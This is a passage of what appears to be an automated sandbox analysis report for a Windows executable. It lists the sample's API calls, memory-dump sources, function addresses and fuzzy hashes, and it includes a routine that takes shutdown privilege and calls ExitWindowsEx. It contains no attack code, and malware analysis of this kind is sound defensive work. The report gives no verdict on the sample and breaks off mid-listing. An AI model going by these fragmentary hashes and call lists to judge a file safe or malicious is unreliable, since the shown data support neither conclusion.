                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: .tmp
                                                                                            • API String ID: 1375471231-2986845003
                                                                                            • Opcode ID: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                                            • Instruction ID: 7d66a9fb3acca2a164fab1eb31a00c007328e74e7b0c548e792a27499ccb9c3a
                                                                                            • Opcode Fuzzy Hash: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                                            • Instruction Fuzzy Hash: A1213574A002099BDB05FFA1C9429DFB7B9EF88304F50457BE901B73C2DA7C9E059AA5

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                            • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                                            • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                            • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                            • String ID:
                                                                                            • API String ID: 2987862817-0
                                                                                            • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                            • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                            • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                            • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

                                                                                             Control-flow Graph
                                                                                             • Block 397: 40766c-407691 (SetFilePointer)
                                                                                             • Block 398: 4076a3-4076a8
                                                                                             • Block 399: 407693-40769a (GetLastError)
                                                                                             • Block 400: 40769c-40769e (call 40748c)
                                                                                             • Edges: 397->398, 397->399, 399->398, 399->400, 400->398
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021103AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                            • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                            • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                            • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                             Control-flow Graph
                                                                                             • Block 391: 40762c-40764a (ReadFile)
                                                                                             • Block 392: 407663-40766a
                                                                                             • Block 393: 40764c-407650
                                                                                             • Block 394: 407652-40765a (GetLastError)
                                                                                             • Block 395: 40765c-40765e (call 40748c)
                                                                                             • Edges: 391->392, 391->393, 393->394, 393->395, 394->392, 394->395, 395->392
                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastRead
                                                                                            • String ID:
                                                                                            • API String ID: 1948546556-0
                                                                                            • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                            • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                            • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                            • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

                                                                                             Control-flow Graph
                                                                                             • Block 402: 4075c4-4075e5 (SetFilePointer)
                                                                                             • Block 403: 4075f7-4075f9
                                                                                             • Block 404: 4075e7-4075ee (GetLastError)
                                                                                             • Block 405: 4075f0-4075f2 (call 40748c)
                                                                                             • Edges: 402->403, 402->404, 404->403, 404->405, 405->403
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021103AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                            • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                            • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                            • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFree
                                                                                            • String ID:
                                                                                            • API String ID: 2087232378-0
                                                                                            • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                            • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                            • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                            • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                              • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                              • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1658689577-0
                                                                                            • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                            • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                                            • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                            • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                            • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                            • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                            • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                            • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                            • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                            • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                            • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                            • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                            • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021103AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastWrite
                                                                                            • String ID:
                                                                                            • API String ID: 442123175-0
                                                                                            • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                            • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                            • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                            • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                            APIs
                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessage
                                                                                            • String ID:
                                                                                            • API String ID: 1306739567-0
                                                                                            • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                            • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                            • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                            • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                            APIs
                                                                                            • SetEndOfFile.KERNEL32(?,02127CA4,0040A08C,00000000), ref: 004076B3
                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021103AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 734332943-0
                                                                                            • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                            • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                            • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                            • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
• Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
• Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
• Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
• Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
APIs
• CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
Memory Dump Source
• Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CharPrev
• String ID:
• API String ID: 122130370-0
• Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
• Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
• Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
• Instruction Fuzzy Hash:
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
Memory Dump Source
• Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
• Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
• Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
• Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
APIs
• VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
Memory Dump Source
• Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
• Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
• Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
• Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
APIs
Memory Dump Source
• Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
• Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
• Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
• Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
Memory Dump Source
• Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
• Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
• Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
• Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 00409457
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
Strings
Memory Dump Source
